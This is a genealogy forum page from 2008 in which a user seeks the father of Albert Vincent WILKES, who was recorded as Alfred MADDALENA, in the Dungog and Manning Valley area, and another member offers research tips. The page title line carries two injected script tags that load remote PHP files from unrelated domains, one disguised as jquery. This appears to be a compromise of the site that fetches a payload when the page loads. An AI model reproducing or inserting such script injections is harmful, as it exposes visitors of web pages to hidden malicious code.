WILKES/MADDALENA in Dungog and Manning Valley, NSW, AU<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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WILKES/MADDALENA in Dungog and Manning Valley, NSW, AU

Journal by laren

I've run into a bit of a brick wall researching the Wilkes family.

The person I am interested in is Albert Vincent WILKES. He was born
22 Mar 1902, Stuarts River, NSW, Australia. D. 1973 in Evans Head,
NSW, Australia

Now the squirly part is that the only documentation I have on him is
his marriage certificate (the original, not copy/extract) 22 Nov 1926.

On this his name is listed as Alfred MADDALENA. He lists his fathers
name as Louis MADDALENA. The only other document I have is my
grandmothers Baptism Certificate - her name is listed as Gwendoline

I have evidence that his mother, Mary Louisa WILKES married Louis
Napoleon MADDALENA sometime in 1907, after which they had a number of

So, at least until the birth of his daughter in 1927 he was using the
name MADDALENA, I believe he found out some time in 1928 (I have a
letter dated 1960 from the Registrar Generals Dept saying that my
grandmothers birth records were changed in 1928 to list Albert
Vincent WILKES as her father) at some stage after 1927 he started
using the name Albert Vincent WILKES ie mothers maiden name. Birth
certificate lists no fathers name. So he might have needed a birth
certificate at some stage and found out that Louis Napleon MADDALENA
was either not his biological father or was his biological father -
though out of wedlock - and started using his mothers name.

What am I looking for?

1) Evidence, story, family gossip as to who his father might be. His
mothers family are originally from around the Dungog area of the
Hunter Valley but starting around 1971 at least three children,
including Mary Louisa, Clara Caroline and Whitney Wilkes were born in
the Manning River area. Her parents were Thomas Frederick WILKES and
Susannah Philipa GREGORY.

2) Fill in some of the history around the WILKES and MADDALENA families.

3) Some ideas on where information might be found about the real
story of his birth and any tips on tracing children born outside of wedlock.


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by laren Profile | Research | Contact | Subscribe | Block this user
on 2008-03-13 18:48:04

laren has been a Family Tree Circles member since Jan 2008. is researching the following names: CANET, ODONNELL, MUNRO and 30 other(s).

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by allycat on 2008-03-13 21:47:28

1) Register as a new user of RootsChat then Ctrl+F type in Australia - to find their Emigrants to Australia board. Post a new topic to see what rootschatters can dig up for you.

2. Goto The Surname Navigator. Click on a country from the drop down list (there are three searches available for Australia) and type in MADDALENA then press submit. About 14 window boxes will open up full of info for you to sift through.

3. "...Destitute and Deserted - Saturday 22 April, 10:00am-12:30pm
If your ancestor was poor, pregnant and/or deserted in Sydney in the 1800s chances are they spent some time in the Sydney Benevolent Asylum - and this is sometimes where you'll find named the father of that illegitimate child you are trying to trace. Join Heather Garnsey and Martyn Killion as they explore the Benevolent Society of NSW and the valuable records it created on our 19th century ancestors.
$22 ($18 SAG members)..."

Society of Australian Genealogists


by allycat on 2008-03-13 22:41:07

I just checked my GEDCOM file and I have a WILKES from Dungog connection in my family tree...

Jane Elizabeth WILKES (sometimes known as Elizabeth Jane) born 1829 Southwark, London, England and died 1915 Dungog, NSW. She married in 1847 NSW to James HAGGARTY born 1822 Bannow, County Wexford, Ireland and they had a large family of 12 children (have all names) from 1848 to 1868 at born Dungog.

Jane Elizabeth WILKES was the daughter of Thomas WILKES and Elizabeth.

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